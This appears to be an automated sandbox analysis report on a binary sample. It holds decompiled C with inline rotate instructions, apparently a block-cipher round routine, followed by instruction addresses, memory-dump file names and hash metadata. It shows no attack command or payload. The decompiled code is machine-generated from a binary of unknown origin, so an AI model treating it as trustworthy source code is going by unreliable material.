				_t1489 = _t1487 ^ _t934 ^ _t678;
				_t1223 = _t1489 | _v8;
				_v16 = _t1223 ^ _t1757;
				_t939 = _v12 ^ _v8 ^ _t678;
				_t1225 = (_t1223 | _t1757) ^ _t939;
				_t1760 = (_t939 | _v16) ^ _t1489 & _t678 ^  *(__eax + 0xd4);
				_t948 = (_t1225 & _t678 ^ _v12) & _v16 ^  *(__eax + 0xdc) ^ _t1489;
				asm("ror edi, 0x16");
				_t1493 =  *(__eax + 0xd8) ^ _t1225 ^ _t1760 << 0x00000007 ^ _t948;
				asm("ror edx, 0x5");
				_t1231 =  *(__eax + 0xd0) ^ _v16 ^ _t1760 ^ _t948;
				asm("ror ecx, 0x7");
				asm("ror esi, 1");
				_v12 = _t948 ^ _t1231 << 0x00000003 ^ _t1493;
				_t951 = _t1760 ^ _t1493 ^ _t1231;
				asm("ror edi, 0x3");
				asm("ror edx, 0xd");
				_t682 = _t951 ^ _v12;
				_v16 = _t1493 ^ _t1231;
				_t1766 = _t682 ^ _t1493;
				_t1496 = _t1766 & _t951 ^ _v16;
				_t1767 =  !_t1766;
				_t957 = (( !_t682 | _t1231) ^ _v12 | _v16) ^ _t682;
				_t958 = _t957 ^  *(__eax + 0xcc);
				_t684 = _t957 | _t1496;
				_t1234 =  *(__eax + 0xc4) ^ _t684 ^ _t1767;
				asm("ror esi, 0x16");
				_t1773 = _t1767 & _v12 ^  *(__eax + 0xc8) ^ _t684 ^ _v16 ^ _t1234 << 0x00000007 ^ _t958;
				asm("ror ebx, 0x5");
				_t690 =  *(__eax + 0xc0) ^ _t1496 ^ _t958 ^ _t1234;
				asm("ror ecx, 0x7");
				asm("ror edx, 1");
				asm("ror esi, 0x3");
				_v12 = _t1773;
				_v8 = _t958 ^ _t690 << 0x00000003 ^ _t1773;
				_t961 = _t1234 ^ _t1773 ^ _t690;
				asm("ror ebx, 0xd");
				_t1501 = _v12 ^ _t961 ^ _t690;
				_t1239 = (_v8 | _t961) ^ _t1501;
				_t1775 = _v8 ^ _t690;
				_v32 = _t1501;
				_v28 = _t1775;
				_t1505 = ((_t1775 | _v12) ^ _t961) & _v32;
				_v32 = _t1505;
				_t1777 = _t1505 ^ _v28;
				_t1778 = _t1777 ^  *(__eax + 0xb4);
				_t1240 = _t1239 ^  *(__eax + 0xbc);
				_v16 =  !(_t961 & _t690) ^ _v32;
				asm("ror ecx, 0x16");
				_t969 =  *(__eax + 0xb8) ^ _v16 ^ _t1777 & _t1239 ^ _t1778 << 0x00000007 ^ _t1240;
				asm("ror edi, 0x5");
				_t1516 = _v8 & _t690 ^  *(__eax + 0xb0) ^ _v16 ^ _v12 ^ _t1778 ^ _t1240;
				asm("ror edx, 0x7");
				_t1242 = _t1240 ^ _t1516 << 0x00000003 ^ _t969;
				asm("ror esi, 1");
				_t1780 = _t1778 ^ _t969 ^ _t1516;
				asm("ror ecx, 0x3");
				_v12 = _t1242;
				_t694 = _t969 ^ _t1242;
				asm("ror edi, 0xd");
				_t1245 = _t1516 ^ _t1780 ^ _v12;
				_v16 = _t1780;
				_t1783 = (_t1245 | _t969) ^ _t1516;
				_t972 = _t1783 & _t694 ^ _t1245;
				_t1247 = _v16 & _v12;
				_v28 = _t1247;
				_t1249 = (_t1247 | _t972) ^  !_t1783;
				_t1250 = _t1249 ^  *(__eax + 0xac);
				_t973 = _t972 ^  *(__eax + 0xa4);
				_v32 = _t1249 | _t972;
				asm("ror edi, 0x16");
				_v12 = (_t1516 | _v16) ^  *(__eax + 0xa8) ^  !_t694 ^ _t973 << 0x00000007 ^ _t1250;
				asm("ror esi, 0x5");
				_t1796 =  *(__eax + 0xa0) ^ _v32 ^ _v28 ^ _t694 ^ _t1250 ^ _t973;
				asm("ror edx, 0x7");
				asm("ror ecx, 1");
				_v8 = _t1250 ^ _t1796 << 0x00000003 ^ _v12;
				_t975 = _t973 ^ _v12 ^ _t1796;
				asm("ror dword [ebp-0x8], 0x3");
				asm("ror esi, 0xd");
				_t697 = (_t975 | _t1796) & _v8;
				_t1255 = _t975 & _t1796 | _v12;
				_t698 = _t697 ^ _t975;
				_t1525 = _t697 ^ _t1255;
				_t980 = ( !_v8 ^ _t1525 | _t698) ^ _t1796;
				_v28 = _t1255;
				_t1259 = (_t980 | _v8) ^ _t698 ^ _v12;
				_t981 = _t980 ^  *(__eax + 0x94);
				_v28 = _v28 ^ _t980;
				_t1526 = _t1525 ^  *(__eax + 0x9c);
				_v32 = _t1525 & _t1796 ^ _t1259;
				asm("ror ebx, 0x16");
				_t708 =  *(__eax + 0x98) ^ _v32 ^ _v28 ^ _t981 << 0x00000007 ^ _t1526;
				asm("ror esi, 0x5");
				_t1802 =  *(__eax + 0x90) ^ _t1259 ^ _t981 ^ _t1526;
				asm("ror edi, 0x7");
				_t1528 = _t1526 ^ _t1802 << 0x00000003 ^ _t708;
				_v12 = _t1528;
				asm("ror ecx, 1");
				asm("ror ebx, 0x3");
				asm("ror esi, 0xd");
				_v16 = _t981 ^ _t708 ^ _t1802;
				_t985 = _t708 ^ _t1802;
				_t1266 = ( !_t708 | _t1802) ^ _v16 ^ _t1528;
				_t1805 = (_t1802 | _v16) ^ _t1266 | _t985 & _v16;
				_t1532 = _t1805 ^ _t708;
				_t1267 = _t1266 ^  *(__eax + 0x84);
				_t710 =  !_t1266;
				_t988 = (_t985 | _v12) ^ _t710 ^ _t1805;
				_t1807 = _t988 ^  *(__eax + 0x8c);
				_v32 = _t988 & _t1532;
				asm("ror ecx, 0x16");
				_t995 =  *(__eax + 0x88) ^ _v32 ^ _t710 ^ _v16 ^ _t1267 << 0x00000007 ^ _t1807;
				asm("ror ebx, 0x5");
				_t716 =  *(__eax + 0x80) ^ _t1532 ^ _t1807 ^ _t1267;
				asm("ror esi, 0x7");
				asm("ror edx, 1");
				_t1269 = _t1267 ^ _t995 ^ _t716;
				asm("ror ecx, 0x3");
				_v8 = _t1807 ^ _t716 << 0x00000003 ^ _t995;
				_t1536 =  !_t995;
				_t1812 = _t1536 & _t1269 ^ _v8;
				asm("ror ebx, 0xd");
				_v32 = _t1812;
				_t1813 = _t1812 & _t716;
				_v28 = _t1813;
				_t1815 = _t1813 ^ _t1536 ^ _t1269;
				_v20 = _t1536;
				_t1816 = _t1815 ^  *(__eax + 0x7c);
				_t1538 = _t1815 | _t1269;
				_v16 = _t1269;
				_t1271 = _v8 | _t716;
				_v24 = _t1538;
				_v12 = _t1271;
				_t1541 = _t1538 & _t716 ^  *(__eax + 0x74) ^ _v32;
				asm("ror ecx, 0x16");
				_t1001 = (_t995 ^ _t716 | _v28) ^ _t1271 & _v16 ^  *(__eax + 0x78) ^ _t1541 << 0x00000007 ^ _t1816;
				asm("ror edx, 0x5");
				_t1280 =  *(__eax + 0x70) ^ _v12 ^ _v24 ^ _v20 ^ _t1541 ^ _t1816;
				asm("ror esi, 0x7");
				asm("ror edi, 1");
				_t719 = _t1816 ^ _t1280 << 0x00000003 ^ _t1001;
				asm("ror ecx, 0x3");
				_t1819 = _t1541 ^ _t1001 ^ _t1280;
				asm("ror edx, 0xd");
				_v16 = _t1001;
				_t1003 = (_t1001 | _t719) ^ _t1819;
				_v8 = _t1819 | _t719;
				_v12 = _t719;
				_t1824 = (_t1280 ^ _t719) & _v8 ^ _t1003;
				_t1545 = _t1003 & _t1280;
				_t1281 =  !_t1280;
				_t1825 = _t1824 ^  *(__eax + 0x6c);
				_v32 = _t1281 | _t1824;
				_t1286 =  *(__eax + 0x64) ^ _t1545 ^ _v16 ^ _v12;
				_v28 = _v16 ^ _t1824 | _t1281;
				asm("ror edi, 0x16");
				asm("ror ebx, 0x5");
				_t729 =  *(__eax + 0x60) ^ _v28 ^ _t1003 ^ _t1825 ^ _t1286;
				asm("ror esi, 0x7");
				_t1006 = (_t1545 | _v16) ^  *(__eax + 0x68) ^ _v32 ^ _v8 ^ _t1286 << 0x00000007 ^ _t1825;
				asm("ror edx, 1");
				_t1288 = _t1286 ^ _t1006 ^ _t729;
				asm("ror ecx, 0x3");
				_v8 = _t1825 ^ _t729 << 0x00000003 ^ _t1006;
				_t1553 = _t1006 | _t1288;
				asm("ror ebx, 0xd");
				_t1829 = _t1006 ^ _t1288;
				_v12 = _t1553;
				_t1555 = _t1553 ^ _t1006 ^ _t729;
				_t1290 = _t1555 | _v8;
				_v16 = _t1290 ^ _t1829;
				_t1011 = _v12 ^ _v8 ^ _t729;
				_t1292 = (_t1290 | _t1829) ^ _t1011;
				_t1832 = (_t1011 | _v16) ^ _t1555 & _t729 ^  *(__eax + 0x54);
				_t1020 = (_t1292 & _t729 ^ _v12) & _v16 ^  *(__eax + 0x5c) ^ _t1555;
				asm("ror edi, 0x16");
				_t1559 =  *(__eax + 0x58) ^ _t1292 ^ _t1832 << 0x00000007 ^ _t1020;
				asm("ror edx, 0x5");
				_t1298 =  *(__eax + 0x50) ^ _v16 ^ _t1832 ^ _t1020;
				asm("ror ecx, 0x7");
				asm("ror esi, 1");
				_v12 = _t1020 ^ _t1298 << 0x00000003 ^ _t1559;
				_t1023 = _t1832 ^ _t1559 ^ _t1298;
				asm("ror edi, 0x3");
				_t733 = _t1023 ^ _v12;
				asm("ror edx, 0xd");
				_v16 = _t1559 ^ _t1298;
				_t1838 = _t733 ^ _t1559;
				_t1562 = _t1838 & _t1023 ^ _v16;
				_t1839 =  !_t1838;
				_t1029 = (( !_t733 | _t1298) ^ _v12 | _v16) ^ _t733;
				_t1030 = _t1029 ^  *(__eax + 0x4c);
				_t735 = _t1029 | _t1562;
				_t1301 =  *(__eax + 0x44) ^ _t735 ^ _t1839;
				_v32 = _t1562;
				asm("ror esi, 0x16");
				_t736 = _t1839 & _v12 ^  *(__eax + 0x48) ^ _t735 ^ _v16 ^ _t1301 << 0x00000007 ^ _t1030;
				asm("ror edi, 0x5");
				_t1568 =  *(__eax + 0x40) ^ _v32 ^ _t1030 ^ _t1301;
				asm("ror ecx, 0x7");
				asm("ror edx, 1");
				asm("ror ebx, 0x3");
				_t1848 = _t1030 ^ _t1568 << 0x00000003 ^ _t736;
				_v12 = _t736;
				_t1033 = _t1301 ^ _t736 ^ _t1568;
				asm("ror edi, 0xd");
				_t738 = _t736 ^ _t1033 ^ _t1568;
				_v8 = _t1848;
				_t1306 = (_v8 | _t1033) ^ _t738;
				_t1849 = _t1848 ^ _t1568;
				_v32 = _t738;
				_v28 = _t1849;
				_t742 = ((_t1849 | _v12) ^ _t1033) & _v32;
				_t1851 = _t742 ^ _v28;
				_v32 = _t742;
				_t1036 =  !(_t1033 & _t1568) ^ _v32;
				_t1852 = _t1851 ^  *(__eax + 0x34);
				_t1307 = _t1306 ^  *(__eax + 0x3c);
				_v28 = _t1851 & _t1306;
				_v32 = _t1036;
				asm("ror ebx, 0x16");
				_t749 =  *(__eax + 0x38) ^ _t1036 ^ _v28 ^ _t1852 << 0x00000007 ^ _t1307;
				asm("ror ecx, 0x5");
				_t1045 = _v8 & _t1568 ^  *(__eax + 0x30) ^ _v32 ^ _v12 ^ _t1852 ^ _t1307;
				asm("ror edx, 0x7");
				_t1309 = _t1307 ^ _t1045 << 0x00000003 ^ _t749;
				asm("ror esi, 1");
				_t1854 = _t1852 ^ _t749 ^ _t1045;
				asm("ror ebx, 0x3");
				_t1572 = _t749 ^ _t1309;
				asm("ror ecx, 0xd");
				_v12 = _t1309;
				_t1312 = _t1045 ^ _t1854 ^ _v12;
				_v16 = _t1854;
				_t1857 = (_t1312 | _t749) ^ _t1045;
				_t752 = _t1572 & _t1857 ^ _t1312;
				_t1314 = _v16 & _v12;
				_v32 = _t1314;
				_t1316 = (_t1314 | _t752) ^  !_t1857;
				_v8 = _t1316;
				_t1861 = __eax + 0x23c;
				_v12 = (_t1045 | _v16) ^  *(__eax + 0x28) ^  !_t1572 ^  *(__eax + 0x238);
				 *(__eax + 0x230) = _v48;
				 *(__eax + 0x234) = _v44;
				 *(__eax + 0x238) = _v40;
				 *_t1861 = _v36;
				_t544 = _a4;
				 *_t544 = (_t1316 | _t752) ^  *(__eax + 0x20) ^ _t1572 ^  *(__eax + 0x230) ^ _v32;
				_t544[1] = _t752 ^  *(__eax + 0x24) ^  *(__eax + 0x234);
				_t544[2] = _v12;
				_t544[3] = _v8 ^  *(__eax + 0x2c) ^  *_t1861;
				return _t544;
			}

0x00759550
0x00759554
0x00759558
0x0075955b
0x0075955e
0x00759561
0x00759567
0x0075956a
0x00759570
0x00759573
0x00759579
0x00759582
0x00759585
0x0075958f
0x00759591
0x00759596
0x0075959b
0x007595a7
0x007595b2
0x007595b5
0x007595c4
0x007595ca
0x007595db
0x007595e8
0x007595ea
0x007595ef
0x007595f1
0x007595fd
0x00759603
0x00759606
0x00759609
0x0075960c
0x0075961a
0x0075961d
0x00759629
0x00759630
0x00759634
0x0075963a
0x0075963e
0x00759642
0x0075964a
0x0075965d
0x0075966b
0x0075966f
0x00759674
0x00759676
0x00759682
0x00759686
0x00759688
0x0075968b
0x00759690
0x00759696
0x00759699
0x0075969c
0x0075969f
0x007596a1
0x007596a6
0x007596a8
0x007596ab
0x007596b5
0x007596bb
0x007596c0
0x007596c2
0x007596c8
0x007596db
0x007596de
0x007596f1
0x007596f9
0x007596fe
0x00759705
0x0075970c
0x0075970e
0x00759714
0x00759717
0x0075971c
0x0075971f
0x00759721
0x00759725
0x0075972f
0x00759735
0x0075973b
0x0075973d
0x00759743
0x00759749
0x00759760
0x00759766
0x0075976e
0x00759783
0x00759788
0x0075978a
0x00759794
0x00759798
0x0075979c
0x0075979e
0x007597a3
0x007597a5
0x007597aa
0x007597ac
0x007597af
0x007597b4
0x007597b8
0x007597bf
0x007597ca
0x007597cc
0x007597dd
0x007597ef
0x007597fe
0x0075980c
0x0075980e
0x00759813
0x00759815
0x00759821
0x00759827
0x0075982a
0x0075982c
0x0075982f
0x00759834
0x0075983b
0x00759840
0x00759846
0x0075985b
0x0075985d
0x00759861
0x00759867
0x0075986b
0x00759880
0x0075988b
0x0075988f
0x00759894
0x00759896
0x007598a2
0x007598a8
0x007598ab
0x007598ae
0x007598b4
0x007598b7
0x007598b9
0x007598c3
0x007598c7
0x007598c9
0x007598d1
0x007598d6
0x007598db
0x007598e0
0x007598ea
0x007598f2
0x007598f8
0x0075990b
0x0075991b
0x00759923
0x00759928
0x0075992a
0x00759934
0x00759936
0x0075993a
0x0075993c
0x0075993f
0x00759942
0x00759947
0x00759949
0x00759950
0x00759957
0x00759966
0x0075996b
0x00759970
0x00759975
0x00759979
0x00759981
0x00759987
0x00759992
0x007599a8
0x007599ad
0x007599b2
0x007599b4
0x007599c1
0x007599c6
0x007599c9
0x007599cb
0x007599cf
0x007599d6
0x007599dd
0x007599e2
0x007599e7
0x007599ef
0x007599f1
0x007599fb
0x00759a03
0x00759a09
0x00759a0e
0x00759a18
0x00759a2c
0x00759a39
0x00759a3b
0x00759a40
0x00759a42
0x00759a4c
0x00759a4e
0x00759a54
0x00759a57
0x00759a5e
0x00759a68
0x00759a6a
0x00759a6d
0x00759a7c
0x00759a80
0x00759a84
0x00759a8a
0x00759a8e
0x00759a92
0x00759a9a
0x00759aad
0x00759abb
0x00759abf
0x00759ac4
0x00759ac6
0x00759ad2
0x00759ad6
0x00759ad8
0x00759add
0x00759adf
0x00759ae6
0x00759ae9
0x00759aec
0x00759aef
0x00759af1
0x00759af4
0x00759af9
0x00759afb
0x00759b00
0x00759b06
0x00759b0b
0x00759b0d
0x00759b18
0x00759b2b
0x00759b2e
0x00759b41
0x00759b49
0x00759b4e
0x00759b50
0x00759b5c
0x00759b62
0x00759b65
0x00759b67
0x00759b6c
0x00759b6f
0x00759b71
0x00759b75
0x00759b7f
0x00759b85
0x00759b8b
0x00759b8d
0x00759b93
0x00759b99
0x00759bb0
0x00759bb6
0x00759bbe
0x00759bd3
0x00759bd8
0x00759bda
0x00759be4
0x00759be8
0x00759bec
0x00759bee
0x00759bf3
0x00759bf5
0x00759bfa
0x00759bff
0x00759c02
0x00759c04
0x00759c08
0x00759c0f
0x00759c1a
0x00759c1c
0x00759c2d
0x00759c3f
0x00759c4e
0x00759c5c
0x00759c5e
0x00759c63
0x00759c65
0x00759c71
0x00759c77
0x00759c7a
0x00759c7c
0x00759c7f
0x00759c84
0x00759c8b
0x00759c90
0x00759c96
0x00759cab
0x00759cad
0x00759cb1
0x00759cb7
0x00759cbb
0x00759cd0
0x00759cdd
0x00759cdf
0x00759ce4
0x00759ce6
0x00759cf2
0x00759cf6
0x00759cfb
0x00759cfe
0x00759d07
0x00759d10
0x00759d13
0x00759d15
0x00759d17
0x00759d19
0x00759d21
0x00759d26
0x00759d2b
0x00759d30
0x00759d3a
0x00759d42
0x00759d48
0x00759d56
0x00759d6b
0x00759d73
0x00759d78
0x00759d7a
0x00759d84
0x00759d86
0x00759d8a
0x00759d8c
0x00759d8f
0x00759d94
0x00759d96
0x00759d9d
0x00759da0
0x00759da7
0x00759db0
0x00759db5
0x00759dba
0x00759dbf
0x00759dc3
0x00759dcb
0x00759dd7
0x00759de0
0x00759df8
0x00759dfd
0x00759e02
0x00759e04
0x00759e11
0x00759e16
0x00759e19
0x00759e1b
0x00759e1f
0x00759e26
0x00759e2d
0x00759e32
0x00759e37
0x00759e3f
0x00759e41
0x00759e4b
0x00759e53
0x00759e59
0x00759e5e
0x00759e68
0x00759e7c
0x00759e89
0x00759e8b
0x00759e90
0x00759e92
0x00759e9c
0x00759e9e
0x00759ea4
0x00759ea7
0x00759eaa
0x00759ead
0x00759eb2
0x00759ec0
0x00759ecc
0x00759ed0
0x00759ed4
0x00759eda
0x00759ede
0x00759ee2
0x00759eea
0x00759efd
0x00759f0b
0x00759f0f
0x00759f14
0x00759f16
0x00759f22
0x00759f26
0x00759f28
0x00759f2d
0x00759f2f
0x00759f36
0x00759f39
0x00759f3c
0x00759f3f
0x00759f41
0x00759f46
0x00759f48
0x00759f4b
0x00759f50
0x00759f56
0x00759f5b
0x00759f62
0x00759f6d
0x00759f73
0x00759f83
0x00759f8e
0x00759f99
0x00759f9e
0x00759fa0
0x00759fac
0x00759fb2
0x00759fb5
0x00759fb7
0x00759fb9
0x00759fbc
0x00759fc1
0x00759fc5
0x00759fcf
0x00759fd5
0x00759fdb
0x00759fdd
0x00759fe3
0x00759fe9
0x0075a000
0x0075a006
0x0075a00e
0x0075a023
0x0075a028
0x0075a02a
0x0075a034
0x0075a038
0x0075a03c
0x0075a03e
0x0075a043
0x0075a045
0x0075a048
0x0075a04d
0x0075a052
0x0075a054
0x0075a058
0x0075a05f
0x0075a06a
0x0075a06c
0x0075a07d
0x0075a08f
0x0075a09e
0x0075a0ac
0x0075a0ae
0x0075a0b3
0x0075a0b5
0x0075a0c1
0x0075a0c7
0x0075a0ca
0x0075a0cc
0x0075a0cf
0x0075a0d4
0x0075a0db
0x0075a0e0
0x0075a0e6
0x0075a0fb
0x0075a0fd
0x0075a101
0x0075a107
0x0075a10b
0x0075a120
0x0075a12d
0x0075a12f
0x0075a134
0x0075a138
0x0075a142
0x0075a148
0x0075a14b
0x0075a151
0x0075a157
0x0075a160
0x0075a163
0x0075a165
0x0075a167
0x0075a169
0x0075a171
0x0075a176
0x0075a17b
0x0075a180
0x0075a18a
0x0075a192
0x0075a198
0x0075a1a6
0x0075a1bb
0x0075a1c3
0x0075a1c8
0x0075a1ca
0x0075a1d4
0x0075a1d6
0x0075a1da
0x0075a1dc
0x0075a1df
0x0075a1e4
0x0075a1e6
0x0075a1ed
0x0075a1f0
0x0075a1f7
0x0075a1fd
0x0075a202
0x0075a207
0x0075a20c
0x0075a213
0x0075a221
0x0075a227
0x0075a230
0x0075a248
0x0075a24d
0x0075a252
0x0075a254
0x0075a261
0x0075a266
0x0075a269
0x0075a26b
0x0075a26f
0x0075a276
0x0075a27d
0x0075a282
0x0075a287
0x0075a28f
0x0075a291
0x0075a29b
0x0075a2a3
0x0075a2a9
0x0075a2ae
0x0075a2b8
0x0075a2cc
0x0075a2d9
0x0075a2db
0x0075a2e0
0x0075a2e2
0x0075a2ec
0x0075a2ee
0x0075a2f1
0x0075a2f7
0x0075a2fa
0x0075a2fd
0x0075a30b
0x0075a310
0x0075a31c
0x0075a320
0x0075a324
0x0075a32a
0x0075a32e
0x0075a332
0x0075a33a
0x0075a34d
0x0075a35b
0x0075a35f
0x0075a364
0x0075a366
0x0075a372
0x0075a376
0x0075a378
0x0075a37b
0x0075a380
0x0075a386
0x0075a389
0x0075a38c
0x0075a38f
0x0075a391
0x0075a396
0x0075a398
0x0075a39d
0x0075a3a0
0x0075a3a2
0x0075a3a8
0x0075a3aa
0x0075a3b7
0x0075a3bd
0x0075a3c5
0x0075a3d5
0x0075a3dd
0x0075a3e2
0x0075a3e4
0x0075a3f0
0x0075a3f6
0x0075a3f8
0x0075a3fb
0x0075a3fd
0x0075a400
0x0075a405
0x0075a409
0x0075a413
0x0075a419
0x0075a41f
0x0075a421
0x0075a427
0x0075a42a
0x0075a43b
0x0075a441
0x0075a44c
0x0075a45b
0x0075a460
0x0075a462
0x0075a46c
0x0075a470
0x0075a474
0x0075a476
0x0075a479
0x0075a47e
0x0075a482
0x0075a485
0x0075a487
0x0075a48c
0x0075a490
0x0075a499
0x0075a4a4
0x0075a4a6
0x0075a4b2
0x0075a4c1
0x0075a4cd
0x0075a4d8
0x0075a4da
0x0075a4df
0x0075a4e1
0x0075a4ed
0x0075a4f3
0x0075a4f6
0x0075a4f8
0x0075a4fd
0x0075a500
0x0075a507
0x0075a50c
0x0075a512
0x0075a524
0x0075a526
0x0075a52a
0x0075a52d
0x0075a531
0x0075a536
0x0075a546
0x0075a54d
0x0075a555
0x0075a55a
0x0075a55c
0x0075a568
0x0075a56e
0x0075a571
0x0075a573
0x0075a576
0x0075a57a
0x0075a57d
0x0075a57f
0x0075a587
0x0075a589
0x0075a58b
0x0075a593
0x0075a598
0x0075a59f
0x0075a5a2
0x0075a5a7
0x0075a5ac
0x0075a5b1
0x0075a5b4
0x0075a5bf
0x0075a5c2
0x0075a5d4
0x0075a5dc
0x0075a5e1
0x0075a5e3
0x0075a5ed
0x0075a5ef
0x0075a5f3
0x0075a5f5
0x0075a5fa
0x0075a5fc
0x0075a5ff
0x0075a606
0x0075a609
0x0075a610
0x0075a619
0x0075a61e
0x0075a624
0x0075a62b
0x0075a636
0x0075a658
0x0075a660
0x0075a66b
0x0075a674
0x0075a67d
0x0075a686
0x0075a688
0x0075a68c
0x0075a692
0x0075a695
0x0075a698
0x0075a69d

Strings

:Uu, xrefs: 0075954A

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: :Uu
API String ID: 0-824088054
Opcode ID: 005ff60999730f8a5bfa208ed14f1ae49daddb1b2000ea72931efd9a765374d8
Instruction ID: 901912927254eab5ca48277708848aff1e73487379dbb27f6690fdeb1a51c147
Opcode Fuzzy Hash: 005ff60999730f8a5bfa208ed14f1ae49daddb1b2000ea72931efd9a765374d8
Instruction Fuzzy Hash: 6AD2EF77E042249FDB5CCFA6C4955AFF7B3BBCC210B57C1BE8916A7245CA7029428AC4

Uniqueness

Uniqueness Score: -1.00%

Function 0075664C, Relevance: 2.4, Strings: 1, Instructions: 1158
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0075664C(void* __edx, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t566;
				signed int* _t567;
				signed int _t569;
				signed int _t573;
				signed int _t575;
				signed int _t583;
				signed int _t586;
				signed int _t587;
				signed int _t591;
				signed int _t595;
				signed int _t598;
				signed int _t603;
				signed int _t610;
				signed int _t614;
				signed int _t617;
				signed int _t622;
				signed int _t626;
				signed int _t628;
				signed int _t636;
				signed int _t639;
				signed int _t640;
				signed int _t644;
				signed int _t648;
				signed int _t651;
				signed int _t656;
				signed int _t663;
				signed int _t667;
				signed int _t670;
				signed int _t675;
				signed int _t679;
				signed int _t681;
				signed int _t689;
				signed int _t692;
				signed int _t693;
				signed int _t697;
				signed int _t701;
				signed int _t704;
				signed int _t709;
				signed int _t716;
				signed int _t720;
				signed int _t723;
				signed int _t728;
				signed int _t732;
				signed int _t734;
				signed int _t742;
				signed int _t745;
				signed int _t746;
				signed int _t750;
				signed int _t754;
				signed int _t757;
				signed int _t762;
				signed int _t769;
				signed int _t773;
				signed int _t776;
				signed int _t781;
				signed int _t785;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t800;
				signed int _t803;
				signed int _t804;
				signed int _t809;
				signed int _t812;
				signed int _t813;
				signed int _t816;
				signed int _t817;
				signed int _t821;
				signed int _t824;
				signed int _t827;
				signed int _t828;
				signed int _t834;
				signed int _t837;
				signed int _t838;
				signed int _t843;
				signed int _t846;
				signed int _t847;
				signed int _t850;
				signed int _t851;
				signed int _t855;
				signed int _t858;
				signed int _t861;
				signed int _t862;
				signed int _t868;
				signed int _t871;
				signed int _t872;
				signed int _t877;
				signed int _t880;
				signed int _t881;
				signed int _t884;
				signed int _t885;
				signed int _t889;
				signed int _t892;
				signed int _t895;
				signed int _t896;
				signed int _t902;
				signed int _t905;
				signed int _t910;
				signed int _t913;
				signed int _t914;
				signed int _t917;
				signed int _t918;
				signed int _t922;
				signed int _t925;
				signed int _t928;
				signed int _t929;
				signed int _t935;
				signed int _t936;
				signed int _t939;
				signed int _t941;
				signed int _t944;
				signed int _t947;
				signed int _t949;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t961;
				signed int _t962;
				signed int _t964;
				signed int _t965;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t972;
				signed int _t974;
				signed int _t977;
				signed int _t980;
				signed int _t983;
				signed int _t986;
				signed int _t988;
				signed int _t990;
				signed int _t993;
				signed int _t995;
				signed int _t1001;
				signed int _t1002;
				signed int _t1003;
				signed int _t1007;
				signed int _t1008;
				signed int _t1010;
				signed int _t1011;
				signed int _t1013;
				signed int _t1014;
				signed int _t1015;
				signed int _t1016;
				signed int _t1018;
				signed int _t1020;
				signed int _t1023;
				signed int _t1026;
				signed int _t1029;
				signed int _t1032;
				signed int _t1034;
				signed int _t1036;
				signed int _t1039;
				signed int _t1041;
				signed int _t1047;
				signed int _t1048;
				signed int _t1049;
				signed int _t1053;
				signed int _t1054;
				signed int _t1056;
				signed int _t1057;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1064;
				signed int _t1066;
				signed int _t1069;
				signed int _t1072;
				signed int _t1075;
				signed int _t1078;
				signed int _t1079;
				signed int _t1080;
				signed int _t1082;
				signed int _t1085;
				signed int _t1087;
				signed int _t1093;
				signed int _t1094;
				signed int _t1095;
				signed int _t1099;
				signed int _t1100;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1110;
				signed int _t1112;
				signed int _t1115;
				signed int _t1118;
				signed int _t1121;
				signed int _t1124;
				void* _t1125;
				void* _t1133;
				signed int _t1135;
				signed int _t1138;
				signed int _t1139;
				signed int _t1143;
				signed int _t1146;
				signed int _t1154;
				signed int _t1155;
				signed int _t1157;
				signed int _t1162;
				signed int _t1167;
				signed int _t1169;
				signed int _t1170;
				signed int _t1172;
				signed int _t1175;
				signed int _t1176;
				signed int _t1180;
				signed int _t1183;
				signed int _t1191;
				signed int _t1192;
				signed int _t1194;
				signed int _t1199;
				signed int _t1204;
				signed int _t1206;
				signed int _t1207;
				signed int _t1209;
				signed int _t1212;
				signed int _t1213;
				signed int _t1217;
				signed int _t1220;
				signed int _t1228;
				signed int _t1229;
				signed int _t1231;
				signed int _t1236;
				signed int _t1241;
				signed int _t1243;
				signed int _t1244;
				signed int _t1246;
				signed int _t1249;
				signed int _t1250;
				signed int _t1254;
				signed int _t1257;
				signed int _t1265;
				signed int _t1266;
				signed int _t1268;
				signed int _t1273;
				signed int _t1278;
				signed int _t1280;
				signed int _t1281;
				signed int _t1283;
				signed int _t1289;
				signed int _t1293;
				signed int _t1296;
				signed int _t1298;
				signed int _t1302;
				signed int _t1305;
				signed int _t1307;
				signed int _t1308;
				signed int _t1311;
				signed int _t1315;
				signed int _t1318;
				signed int _t1319;
				signed int _t1321;
				signed int _t1325;
				signed int _t1326;
				signed int _t1327;
				signed int _t1331;
				signed int _t1333;
				signed int _t1337;
				signed int _t1338;
				signed int _t1340;
				signed int _t1344;
				signed int _t1348;
				signed int _t1350;
				signed int _t1351;
				signed int _t1354;
				signed int _t1358;
				signed int _t1361;
				signed int _t1362;
				signed int _t1364;
				signed int _t1368;
				signed int _t1369;
				signed int _t1370;
				signed int _t1374;
				signed int _t1376;
				signed int _t1380;
				signed int _t1381;
				signed int _t1383;
				signed int _t1387;
				signed int _t1391;
				signed int _t1393;
				signed int _t1394;
				signed int _t1397;
				signed int _t1401;
				signed int _t1404;
				signed int _t1405;
				signed int _t1407;
				signed int _t1411;
				signed int _t1412;
				signed int _t1413;
				signed int _t1417;
				signed int _t1419;
				signed int _t1423;
				signed int _t1424;
				signed int _t1426;
				signed int _t1430;
				signed int _t1434;
				signed int _t1436;
				signed int _t1437;
				signed int _t1440;
				signed int _t1444;
				signed int _t1447;
				signed int _t1448;
				signed int _t1450;
				signed int _t1454;
				signed int _t1455;
				signed int _t1456;
				signed int _t1460;
				signed int _t1462;
				signed int _t1466;
				signed int _t1467;
				signed int _t1469;
